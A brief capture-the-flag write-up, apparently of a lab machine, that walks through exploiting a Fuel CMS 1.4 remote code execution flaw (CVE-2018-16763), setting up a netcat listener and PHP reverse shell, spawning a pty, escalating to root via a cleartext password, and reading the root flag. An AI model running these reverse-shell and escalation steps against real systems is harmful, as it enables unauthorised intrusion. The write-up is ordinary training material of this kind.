First let's start with enumeration on the target
we can see there is a web server :
running on Fuel CMS 1.4, what is vulnerable to "CVE-2018-16763." (RCE)
here is a script to exploit it in python just remove the proxy usage fonction on it
as you can see i can execute commands, so let's make a reverse shell ! for this i use the shell from pentest monkey
open a web server
python3 -m http.server
download it on the target with
listen to our port with netcat to get the shell
nc -nvlp 1337
and execute the shell like
php shell.php
spawn a shell to get full terminal
python -c ‘import pty; pty.spawn(“/bin/bash”)’
after searching a little bit for the password i find the file
where the root password is in clear
su root
and to get the root password :
cat /root/root.txt